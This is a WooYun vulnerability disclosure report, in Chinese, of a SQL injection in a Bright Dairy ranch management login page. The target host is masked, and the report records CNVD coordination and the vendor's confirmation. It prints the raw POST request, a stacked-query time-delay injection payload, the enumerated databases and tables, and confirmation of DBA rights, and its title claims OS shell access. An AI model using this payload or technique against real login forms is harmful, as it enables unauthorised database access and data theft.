当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0163344

漏洞标题:光明乳业股份有限公司牧场管理系统SQL注入一枚/dba权限/可os-shell

相关厂商:光明乳业股份有限公司

漏洞作者: 逆流冰河

提交时间:2015-12-22 13:44

修复时间:2016-02-09 23:29

公开时间:2016-02-09 23:29

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-22: 细节已通知厂商并且等待厂商处理中
2015-12-26: 厂商已经确认,细节仅向厂商公开
2016-01-05: 细节向核心白帽子及相关领域专家公开
2016-01-15: 细节向普通白帽子公开
2016-01-25: 细节向实习白帽子公开
2016-02-09: 细节向公众公开

简要描述:

如题

详细说明:

1,注入信息:

POST http://**.**.**.**:9020/Login.aspx HTTP/1.1
Host: **.**.**.**:9020
Connection: keep-alive
Content-Length: 252
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://**.**.**.**:9020
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://**.**.**.**:9020/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: ASP.NET_SessionId=vl4fvm55qcgzbj55gmxqmlyl
__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTU2OTY3MDczMGRktSREY4caGdmzo3INPVhYCzx3WoA%3D&__EVENTVALIDATION=%2FwEWBALT3brtCAKl1bKzCQK1qbSWCwKC3IeGDB9FjOVkprJjDWikp2RbglC8Bwcc&txtUserName=admin*&txtPassWord=admin&btnLogin=+%E7%99%BB+%E5%BD%95+


2,注入点
---
Parameter: #1* ((custom) POST)
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKLTU2OTY3MDczMGRktSREY4caGdmzo3INPVhYCzx3WoA=&__EVENTVALIDATION=/wEWBALT3brtCAKl1bKzCQK1qbSWCwKC3IeGDB9FjOVkprJjDWikp2RbglC8Bwcc&txtUserName=admin';WAITFOR DELAY '0:0:5'--&txtPassWord=admin&btnLogin= %E7%99%BB %E5%BD%95
---
web server operating system: Windows 8.1 or 2012 R2
web application technology: ASP.NET, Microsoft IIS 8.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
available databases [11]:
[*] [HstNewCrmSH\x11]
[*] CIS
[*] HstEmp
[*] master
[*] model
[*] msdb
[*] ntmgr
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] yang
3,表信息
Database: CIS
+----------------------------+---------+
| Table | Entries |
+----------------------------+---------+
| dbo.V_product | 27754 |
| dbo.C_Cust_User | 8455 |
| dbo.C_ProdOutstore | 6400 |
| dbo.C_Crop | 4381 |
| dbo.C_ProdOutstore20130228 | 2764 |
| dbo.C_UR_Page | 2624 |
| dbo.C_Customer | 2092 |
| dbo.C_ProdInstore | 1326 |
| dbo.InitCustomer | 1138 |
| dbo.V_month_cows | 917 |
| dbo.c_prodinstore20130228 | 825 |
| dbo.InitProduct | 585 |
| dbo.InitCust2 | 549 |
| dbo.CowCalving | 547 |
| dbo.c_Prodinstore_20121204 | 516 |
| dbo.c_prodinstore_temp | 516 |
| dbo.aqyb | 455 |
| dbo.Cowbaobiao | 367 |
| dbo.prodext | 339 |
| dbo.Cowout | 332 |
| dbo.CowSell | 229 |
| dbo.InitProd | 184 |
| dbo.C_House_Man | 144 |
| dbo.Cost | 120 |
| dbo.C_Page | 101 |
| dbo.C_ProdExt | 79 |
| dbo.C_Supplier | 68 |
| dbo.C_Prov | 40 |
| dbo.C_User_Role | 38 |
| dbo.C_Meadow | 35 |
| dbo.duiying | 32 |
| dbo.C_Parameter | 31 |
| dbo.InitProv | 31 |
| dbo.Cowdie | 22 |
| dbo.C_Role | 14 |
| dbo.C_Region | 13 |
| dbo.C_Prod_Type | 8 |
| dbo.C_Siliao | 6 |
| dbo.C_House | 5 |
| dbo.C_Peizhong | 5 |
| dbo.C_Prop | 2 |
| dbo.C_SMilkOut | 2 |
| dbo.C_PeizhongOperator | 1 |
| dbo.C_ShouyaoOperator | 1 |
| dbo.C_SiliaoOperator | 1 |
| dbo.C_SMilkOperator | 1 |
| dbo.C_UR_Type | 1 |
| dbo.Orders | 1 |
| dbo.sysdiagrams | 1 |
+----------------------------+---------+
4,dba权限
web application technology: ASP.NET, Microsoft IIS 8.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
current user is DBA: True

漏洞证明:

Fix

修复方案:

Fix

版权声明:转载请注明来源 逆流冰河@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:9

确认时间:2015-12-26 23:28

厂商回复:

CNVD确认所述情况,已经由CNVD通过网站公开联系方式向网站管理单位通报。

最新状态:

暂无